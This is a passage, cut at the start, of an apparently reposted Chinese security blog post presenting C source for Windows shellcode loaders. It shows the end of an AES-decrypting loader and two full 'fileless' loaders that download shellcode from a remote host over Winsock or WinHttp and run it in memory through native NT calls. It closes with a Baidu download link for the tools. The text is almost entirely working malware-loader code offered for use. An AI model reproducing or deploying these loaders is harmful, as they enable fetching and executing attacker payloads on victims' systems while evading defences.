0x28, 0x1d, 0x3b, 0xcd, 0x2, 0x7, 0xc, 0x72, 0x37, 0x94, 0xa6, 0x1b, 0x5c, 0x6d, 0x41 };DWORD payload_length = sizeof(AESshellcode);PVOID BaseAddress = NULL;SIZE_T dwSize = 0x2000;NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!NT_SUCCESS(status1)) {return 1;}// Decrypt the AES payload to Original ShellcodeDecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey));RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode));HANDLE hThread;DWORD OldProtect = 0;NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);if (!NT_SUCCESS(NtProtectStatus1)) {return 2;}HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);if (!NT_SUCCESS(NtCreateThreadstatus)) {printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());return 3;}LARGE_INTEGER Timeout;Timeout.QuadPart = -10000000;NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);if (!NT_SUCCESS(NTWFSOstatus)) {printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());return 4;}return 0;}
4、FileLess shellcode:
4-1、Using Sockets:
// credits : @SEKTOR7Module stomping, Module Unhooking, No New Thread, Function obfuscation#include <winsock2.h>#include <ws2tcpip.h>#include <Windows.h>#include <stdio.h>#pragma comment(lib, "ntdll")#pragma comment (lib, "Ws2_32.lib")#pragma comment (lib, "Mswsock.lib")#pragma comment (lib, "AdvApi32.lib")#define NtCurrentProcess() ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endifEXTERN_C NTSTATUS NtAllocateVirtualMemory(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);EXTERN_C NTSTATUS NtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID* BaseAddress,IN OUT PSIZE_T RegionSize,IN ULONG NewProtect,OUT PULONG OldProtect);EXTERN_C NTSTATUS NtCreateThreadEx(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(IN HANDLE Handle,IN BOOLEAN Alertable,IN PLARGE_INTEGER Timeout);void RunShellcode(char* shellcode, DWORD shellcodeLen) {PVOID BaseAddress = NULL;SIZE_T dwSize = 0x2000;PCSTR Terminator = NULL;NTSTATUS STATUS;NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!NT_SUCCESS(status1)) {return ;}RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);HANDLE hThread;DWORD OldProtect = 0;NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);if (!NT_SUCCESS(NtProtectStatus1)) {return ;}HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);if (!NT_SUCCESS(NtCreateThreadstatus)) {printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());return ;}LARGE_INTEGER Timeout;Timeout.QuadPart = -10000000;NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);if (!NT_SUCCESS(NTWFSOstatus)) {printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());return ;}}void getShellcode_Run(char* host, char* port, char* resource) {DWORD oldp = 0;BOOL returnValue;size_t origsize = strlen(host) + 1;const size_t newsize = 100;size_t convertedChars = 0;wchar_t Whost[newsize];mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);WSADATA wsaData;SOCKET ConnectSocket = INVALID_SOCKET;struct addrinfo* result = NULL,* ptr = NULL,hints;char sendbuf[MAX_PATH] = "";lstrcatA(sendbuf, "GET /");lstrcatA(sendbuf, resource);char recvbuf[DEFAULT_BUFLEN];memset(recvbuf, 0, DEFAULT_BUFLEN);int iResult;int recvbuflen = DEFAULT_BUFLEN;// Initialize WinsockiResult = WSAStartup(MAKEWORD(2, 2), &wsaData);if (iResult != 0) {printf("WSAStartup failed with error: %d\n", iResult);return ;}ZeroMemory(&hints, sizeof(hints));hints.ai_family = PF_INET;hints.ai_socktype = SOCK_STREAM;hints.ai_protocol = IPPROTO_TCP;// Resolve the server address and portiResult = getaddrinfo(host, port, &hints, &result);if (iResult != 0) {printf("getaddrinfo failed with error: %d\n", iResult);WSACleanup();return ;}// Attempt to connect to an address until one succeedsfor (ptr = result; ptr != NULL; ptr = ptr->ai_next) {// Create a SOCKET for connecting to serverConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,ptr->ai_protocol);if (ConnectSocket == INVALID_SOCKET) {printf("socket failed with error: %ld\n", WSAGetLastError());WSACleanup();return ;}// Connect to server.printf("[+] Connect to %s:%s", host, port);iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);if (iResult == SOCKET_ERROR) {closesocket(ConnectSocket);ConnectSocket = INVALID_SOCKET;continue;}break;}freeaddrinfo(result);if (ConnectSocket == INVALID_SOCKET) {printf("Unable to connect to server!\n");WSACleanup();return ;}// Send an initial bufferiResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0);if (iResult == SOCKET_ERROR) {printf("send failed with error: %d\n", WSAGetLastError());closesocket(ConnectSocket);WSACleanup();return ;}printf("\n[+] Sent %ld Bytes\n", iResult);// shutdown the connection since no more data will be sentiResult = shutdown(ConnectSocket, SD_SEND);if (iResult == SOCKET_ERROR) {printf("shutdown failed with error: %d\n", WSAGetLastError());closesocket(ConnectSocket);WSACleanup();return ;}// Receive until the peer closes the connectiondo {iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0);if (iResult > 0)printf("[+] Received %d Bytes\n", iResult);else if (iResult == 0)printf("[+] Connection closed\n");elseprintf("recv failed with error: %d\n", WSAGetLastError());RunShellcode(recvbuf, recvbuflen);} while (iResult > 0);// cleanupclosesocket(ConnectSocket);WSACleanup();}int main(int argc, char** argv) {// Validate the parametersif (argc != 4) {printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]);return 1;}getShellcode_Run(argv[1], argv[2], argv[3]);return 0;}
4-2、Using WinHttp:
#include <Windows.h>#include <stdio.h>#include <wininet.h>#include <winhttp.h>#include <vector>#pragma comment(lib, "ntdll")#pragma comment(lib, "winhttp")#pragma warning (disable: 4996)#define _CRT_SECURE_NO_WARNINGS#define NtCurrentProcess() ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endifEXTERN_C NTSTATUS NtAllocateVirtualMemory(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);EXTERN_C NTSTATUS NtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID* BaseAddress,IN OUT PSIZE_T RegionSize,IN ULONG NewProtect,OUT PULONG OldProtect);EXTERN_C NTSTATUS NtCreateThreadEx(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(IN HANDLE Handle,IN BOOLEAN Alertable,IN PLARGE_INTEGER Timeout);void RunShellcode(char* shellcode, DWORD shellcodeLen) {PVOID BaseAddress = NULL;SIZE_T dwSize2 = 0x2000;PCSTR Terminator = NULL;NTSTATUS STATUS;NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!NT_SUCCESS(status1)) {return ;}RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);HANDLE hThread;DWORD OldProtect = 0;NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect);if (!NT_SUCCESS(NtProtectStatus1)) {return;}printf("\n\nShellcode_mem : %p\n\n", BaseAddress);getchar();HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);if (!NT_SUCCESS(NtCreateThreadstatus)) {printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());return;}LARGE_INTEGER Timeout;Timeout.QuadPart = -10000000;NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);if (!NT_SUCCESS(NTWFSOstatus)) {printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());return;}}void getShellcode_Run(wchar_t* whost, DWORD port, wchar_t* wresource) {DWORD dwSize = 0;DWORD dwDownloaded = 0;LPSTR pszOutBuffer = NULL;BOOL bResults = FALSE;HINTERNET hSession = NULL,hConnect = NULL,hRequest = NULL;// Use WinHttpOpen to obtain a session handle.hSession = WinHttpOpen(L"WinHTTP Example/1.0",WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);// Specify an HTTP server.if (hSession)hConnect = WinHttpConnect(hSession, whost, port, 0);elseprintf("Failed in WinHttpConnect (%u)\n", GetLastError());// Create an HTTP request handle.if (hConnect)hRequest = WinHttpOpenRequest(hConnect, L"GET", wresource,NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, NULL);elseprintf("Failed in WinHttpOpenRequest (%u)\n", GetLastError());// Send a request.if (hRequest)bResults = WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS,0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);elseprintf("Failed in WinHttpSendRequest (%u)\n", GetLastError());// End the request.if (bResults)bResults = WinHttpReceiveResponse(hRequest, NULL);else printf("Failed in WinHttpReceiveResponse (%u)\n", GetLastError());// Keep checking for data until there is nothing left.if (bResults)do{// Check for available data.dwSize = 0;if (!WinHttpQueryDataAvailable(hRequest, &dwSize))printf("Error %u in WinHttpQueryDataAvailable (%u)\n", GetLastError());// Allocate space for the buffer.pszOutBuffer = new char[dwSize + 1];if (!pszOutBuffer){printf("Out of memory\n");dwSize = 0;}else{// Read the Data.ZeroMemory(pszOutBuffer, dwSize + 1);if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,dwSize, &dwDownloaded))printf("Error %u in WinHttpReadData.\n", GetLastError());else {// Run the shellcodeRunShellcode(pszOutBuffer, dwSize + 1);}}} while (dwSize > 0);// Report any errors.if (!bResults)printf("Error %d has occurred.\n", GetLastError());// Close any open handles.if (hRequest) WinHttpCloseHandle(hRequest);if (hConnect) WinHttpCloseHandle(hConnect);if (hSession) WinHttpCloseHandle(hSession);}int main(int argc, char** argv) {// Validate the parametersif (argc != 4) {printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]);return 1;}char* host = argv[1];DWORD port = atoi(argv[2]);char* resource = argv[3];const size_t cSize1 = strlen(host) + 1;wchar_t* whost = new wchar_t[cSize1];mbstowcs(whost, host, cSize1);const size_t cSize2 = strlen(resource) + 1;wchar_t* wresource = new wchar_t[cSize2];mbstowcs(wresource, resource, cSize2);getShellcode_Run(whost, port, wresource);return 0;}
下址地址:
链接:https://pan.baidu.com/s/1aQkt93RPdFVR3wj0V13d4w提取码:9g8j
题外话:用 VS2022-V17.5编译,果然如网上介绍的那样,超快,满意!
文章来源:MicroPest
文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247496959&idx=1&sn=2b4b5cc884981d69f0a5e400a608739f&chksm=ea340ba5dd4382b3f84fdad2d327d25b46f00efe9b9627b3ecd4901712b42fdc80f6ec780dd8#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh